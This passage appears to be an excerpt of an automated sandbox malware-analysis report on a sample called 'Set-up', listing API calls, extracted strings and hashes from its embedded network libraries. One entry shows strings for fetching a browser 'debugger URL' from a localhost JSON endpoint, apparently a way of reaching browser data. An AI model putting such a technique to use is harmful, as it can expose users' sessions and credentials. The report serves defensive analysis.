                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$ErrorLastsendto
                          • String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
                          • API String ID: 3285375004-3063461439
                          • Opcode ID: b669100b059977d4123cabc3308be66f48bced06719ea5879879ad09859c7644
                          • Instruction ID: aa985d54976d175f52739cf94c39c4a5e91208aba62a8cab020f5877e6bdc5d1
                          • Opcode Fuzzy Hash: b669100b059977d4123cabc3308be66f48bced06719ea5879879ad09859c7644
                          • Instruction Fuzzy Hash: 7FE1D475A00301BBDB24AB24DC46FAE77D4AF56704F084568FD08AB293EB72E914D792
                          APIs
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00044749
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 000448E5
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0004491B
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044963
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00044971
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0004497B
                            • Part of subcall function 000406F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00045663,?), ref: 000406F9
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044A41
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00044A63
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044A6D
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00044AE0
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044AEA
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00044B28
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044B34
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00044B76
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00044B80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _errno$strtoul$strchr$memchrstrlen
                          • String ID: %ld$%u.%u.%u.%u$urlapi.c
                          • API String ID: 102816355-2423153182
                          • Opcode ID: c14125c09e728a25e0d50889bc0adab357c1b31baed40cfe827eb8f1f3509fb6
                          • Instruction ID: 87fd42e8dc969837f6ec6201d3ed64c72d1fa45346355bb1fd6099d55202e443
                          • Opcode Fuzzy Hash: c14125c09e728a25e0d50889bc0adab357c1b31baed40cfe827eb8f1f3509fb6
                          • Instruction Fuzzy Hash: 56D124F19082116BEB20AB24EC42B7F7BD59F52314F054538F8899B283FB74DD5487AA
                          APIs
                            • Part of subcall function 000686F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000003), ref: 00068704
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00066460
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00066472
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00066487
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0006649C
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00066654
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00066666
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 0006667B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strchr$strlen
                          • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 8.10.1%sQUIT$CLIENT libcurl 8.10.1DEFINE %s %sQUIT$CLIENT libcurl 8.10.1MATCH %s %s %sQUIT$Failed sending DICT request$default$dict.c$lookup word is missing
                          • API String ID: 842768466-2079990832
                          • Opcode ID: e5e686e918b9be77916df5d7cce2c88aedcee30a3456270dc64f3a3b681c6b24
                          • Instruction ID: 76f7e3232e33a595c00a2bfa020f23240b1255a937701630e5bcdbb83a8c22a2
                          • Opcode Fuzzy Hash: e5e686e918b9be77916df5d7cce2c88aedcee30a3456270dc64f3a3b681c6b24
                          • Instruction Fuzzy Hash: 90A11B61E043416AE7722634AD13B7A7ACA9F62748F0C4174FD869A1D3FE73DD50C262
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0010C719
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0010C7C9
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0010CB6F
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(005E37F8,sftp.c,000006F4), ref: 0010CD6E
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left,sftp.c,000005EE), ref: 0010CD83
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->eof,sftp.c,000005EF), ref: 0010CD98
                          Strings
                          • sftp.c, xrefs: 0010CD64, 0010CD79, 0010CD8E
                          • Read Packet At Unexpected Offset, xrefs: 0010CCBD
                          • rc != LIBSSH2_ERROR_EAGAIN || !filep->eof, xrefs: 0010CD93
                          • SFTP Protocol badness: unrecognised read request response, xrefs: 0010CCB3
                          • SFTP READ error, xrefs: 0010CCFF
                          • FXP_READ response too big, xrefs: 0010CCCE
                          • SFTP Protocol badness, xrefs: 0010CCC7
                          • gesftp_read() internal error, xrefs: 0010CA72
                          • rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left, xrefs: 0010CD7E
                          • malloc fail for FXP_WRITE, xrefs: 0010CCDB
                          • Response too small, xrefs: 0010CC86
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert$memcpy$_time64
                          • String ID: FXP_READ response too big$Read Packet At Unexpected Offset$Response too small$SFTP Protocol badness$SFTP Protocol badness: unrecognised read request response$SFTP READ error$gesftp_read() internal error$malloc fail for FXP_WRITE$rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left$rc != LIBSSH2_ERROR_EAGAIN || !filep->eof$sftp.c
                          • API String ID: 2498518694-199359813
                          • Opcode ID: 5d4b898a5fab8a36fd80daf08e38cff25c1c2f7af70b58ab4248a063f35a2c4f
                          • Instruction ID: 42ad18c420b5c5dac2cbc930b79580d4409a73cbe82b80a3cbf16f340b1404bf
                          • Opcode Fuzzy Hash: 5d4b898a5fab8a36fd80daf08e38cff25c1c2f7af70b58ab4248a063f35a2c4f
                          • Instruction Fuzzy Hash: 9F02A0B19043049FC714DF24D885B9ABBE4BF98354F154A29F9CA97292E7B0E904CFD2
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0009C37A
                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0009C476
                          • WSAGetLastError.WS2_32 ref: 0009C4AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLastmemcpystrcpy
                          • String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
                          • API String ID: 31095072-3036451936
                          • Opcode ID: 86ca4c0f16ef2c88a143ca61d90109de5812a37d1e0ac20cc621b3a467546e3f
                          • Instruction ID: ea3fbf36f3bbac135fa02e7ea1c9857af6d4eb4774b778b291c7351fc425a5d9
                          • Opcode Fuzzy Hash: 86ca4c0f16ef2c88a143ca61d90109de5812a37d1e0ac20cc621b3a467546e3f
                          • Instruction Fuzzy Hash: 61511871D083409FEB209B549C41FAFBBD4EF91304F158429F9889B293E675E984DB92
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0006A33C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: $*$???$ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received$QUOT string not accepted: %s$Received only partial file: %lld bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%lld out of %lld bytes)$[%s] closing DATA connection$[%s] done, result=%d$control connection looks dead$ftp.c$partial download completed, closing connection$server did not report OK, got %d
                          • API String ID: 39653677-2752486839
                          • Opcode ID: bdfea3c9c8c8be74273295f0394a04b0f60139ede32402f6c85012a9b0e429c0
                          • Instruction ID: bec3169a14c0c1278ea766639aa0f12600d91d89ad0e9582bd9744b2e2ceb24d
                          • Opcode Fuzzy Hash: bdfea3c9c8c8be74273295f0394a04b0f60139ede32402f6c85012a9b0e429c0
                          • Instruction Fuzzy Hash: 52F191757083019FD750AF24C885B6ABBE6AF96704F088578F888AB243D775E944CF52
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00074AE0
                            • Part of subcall function 00026C30: strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000003F), ref: 00026CF3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strchrstrlen
                          • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$,$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Proxy$Proxy-$Proxy-authorization$Server$http.c
                          • API String ID: 986617436-2322216787
                          • Opcode ID: 9e455aa9952d10d534072290b5cde7f851d8a246fb663089b85369462aa79dd8
                          • Instruction ID: 24fead604df931cf6fa59f7306252c5612fab80a2963a816d49e30b3d1f77bfa
                          • Opcode Fuzzy Hash: 9e455aa9952d10d534072290b5cde7f851d8a246fb663089b85369462aa79dd8
                          • Instruction Fuzzy Hash: A4910170E443146BEB715A249841B7F7AD4AF85314F08843DFD9D8B282EB78DD04CB6A
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp2_buf_avail(buf) >= datamax,nghttp2_session.c,00001E56), ref: 000B25EA
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(bufs->head == bufs->cur,nghttp2_session.c,00001E22,FFFFFE38,00000000), ref: 000B26C7
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(005B3768,nghttp2_session.c,00001E67), ref: 000B26DC
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(&session->aob.framebufs == bufs,nghttp2_session.c,00001E4D), ref: 000B26F1
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS,nghttp2_session.c,00000438), ref: 000B2706
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_session.c,00000446), ref: 000B271B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: &session->aob.framebufs == bufs$0 == rv$bufs->head == bufs->cur$nghttp2_buf_avail(buf) >= datamax$nghttp2_session.c$urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS
                          • API String ID: 1222420520-4202471155
                          • Opcode ID: b4496038c9d3962a10ba803652ea42864e942843e5cea7aa005928a6396b0119
                          • Instruction ID: c8841e9f999945dcaca27477b85cc5702270346efd0a63440c0d3824f254e6fd
                          • Opcode Fuzzy Hash: b4496038c9d3962a10ba803652ea42864e942843e5cea7aa005928a6396b0119
                          • Instruction Fuzzy Hash: 59A1DF712047019FDB14DF24C885BEABBE2BF88304F18856CF8898B6A2D771ED41CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
                          • API String ID: 0-3171374047
                          • Opcode ID: c8c4a97bf61283e8b6ddc57b2c17329580b8ed26ee07b61a8d77155a2bc4eafe
                          • Instruction ID: 6361c85b9925ad62b6d12ab9278dfe431cbf836f36e3aaeeeb0c958f5c6a46dd
                          • Opcode Fuzzy Hash: c8c4a97bf61283e8b6ddc57b2c17329580b8ed26ee07b61a8d77155a2bc4eafe
                          • Instruction Fuzzy Hash: FFB19E71A083019BDB61BB24C8917BE77E4BF92B04F180139E8D957283EB35DE84D792
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000220D4
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000222D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: freemalloc
                          • String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
                          • API String ID: 3061335427-1249806554
                          • Opcode ID: 22cdefba3eba288bb239e41d48d40c4284e4959faed874be68ebc4e4663eea8a
                          • Instruction ID: d3f680fda509197c9f4a2bd808bf125d0f68cb57359486ea03c097df9b6666ce
                          • Opcode Fuzzy Hash: 22cdefba3eba288bb239e41d48d40c4284e4959faed874be68ebc4e4663eea8a
                          • Instruction Fuzzy Hash: B86186B0909715EFDB00EFA8D48579EBBF0BF44314F11891DE588A7342D77999848F92
                          APIs
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,127.0.0.1,?,?,00000000,00073DA5,?,?,?), ref: 00076267
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,::1,?,?,?,?,00000000,00073DA5,?,?,?), ref: 00076279
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0007631C
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00073DA5,?,?), ref: 00076329
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
